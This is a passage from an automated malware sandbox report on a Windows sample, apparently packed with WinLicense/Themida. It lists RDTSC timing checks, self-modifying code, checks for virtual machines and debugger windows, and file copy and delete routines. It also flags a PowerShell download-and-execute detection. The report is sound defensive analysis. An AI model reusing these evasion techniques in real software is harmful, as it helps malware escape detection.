Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB3992 second address: BB3998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8874 second address: BB8892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0AD8C6A9B6h 0x00000009 jmp 00007F0AD8C6A9C1h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8892 second address: BB8898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB89CE second address: BB89D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8CAD second address: BB8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f jmp 00007F0AD95F882Bh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8CDE second address: BB8CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB8FDA second address: BB8FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9152 second address: BB9156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB92A5 second address: BB92D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD95F8844h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB92D1 second address: BB9305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 jmp 00007F0AD8C6A9C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9305 second address: BB930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB930F second address: BB9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC367E second address: BC3688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3688 second address: BC368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC368C second address: BC36CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b pushad 0x0000000c jne 00007F0AD95F8826h 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0AD95F8826h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F0AD95F882Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36CA second address: BC36CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36CE second address: BC36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36D4 second address: BC36E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0AD8C6A9B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC36E4 second address: BC36E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCA48B second address: BCA492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC190 second address: BCC19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC19C second address: BCC1A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC1A2 second address: BCC1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F882Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCC1B7 second address: BCC1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF81F second address: BCF829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF829 second address: BCF86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9CAh 0x0000000e jmp 00007F0AD8C6A9C2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 jl 00007F0AD8C6A9B6h 0x0000001f jmp 00007F0AD8C6A9C4h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE17C8 second address: BE17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE36DD second address: BE36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32AF second address: BE32B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32B3 second address: BE32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32B7 second address: BE32C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE32C8 second address: BE32CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3443 second address: BE3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2F80 second address: BF2F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1DDF second address: BF1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0AD95F882Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF1E09 second address: BF1E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF28EE second address: BF2904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0AD95F882Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2904 second address: BF2927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C3h 0x00000007 jo 00007F0AD8C6A9C2h 0x0000000d js 00007F0AD8C6A9B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A6A second address: BF2A8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 jmp 00007F0AD95F8830h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F0AD95F882Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A8C second address: BF2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2A90 second address: BF2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0AD95F8831h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0AD95F8826h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C42 second address: BF2C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF2C4C second address: BF2C76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8836h 0x00000007 jg 00007F0AD95F8826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F0AD95F8826h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46B0 second address: BF46C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46C3 second address: BF46D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF46D9 second address: BF46DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF7098 second address: BF70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0AD95F882Ch 0x0000000b jnp 00007F0AD95F8826h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF76D0 second address: BF771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0AD8C6A9C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F0AD8C6A9BDh 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F0AD8C6A9C5h 0x0000001d jc 00007F0AD8C6A9BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF771E second address: BF772E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 jl 00007F0AD95F882Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF772E second address: BF7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0AD8C6A9B8h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B09 second address: BF8B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B26 second address: BF8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B2C second address: BF8B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B36 second address: BF8B3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B3C second address: BF8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B48 second address: BF8B52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B52 second address: BF8B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8B61 second address: BF8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA32B second address: BFA330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517050B second address: 517052D instructions: 0x00000000 rdtsc 0x00000002 mov di, 5CA6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F0AD8C6A9BAh 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edx 0x00000017 mov ebx, 1230CC5Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517052D second address: 5170553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0AD95F882Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170553 second address: 5170557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170557 second address: 517055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517055D second address: 5170563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170563 second address: 5170576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop eax 0x0000000e mov di, 69F0h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51705F4 second address: 5170614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170614 second address: 5170618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5170618 second address: 517061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 517061C second address: 5170622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DB17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B17944 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 96DAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B973C3 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006940F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0068E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00681710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006947C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00694B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00693B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00681160 GetSystemInfo,ExitProcess,

0_2_00681160

Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2132664415.0000000001452000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00684610 VirtualProtect ?,00000004,00000100,00000000

0_2_00684610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00699BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00699AA0 mov eax, dword ptr fs:[00000030h]

0_2_00699AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00697690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR

Searches for specific processes (likely to inject)

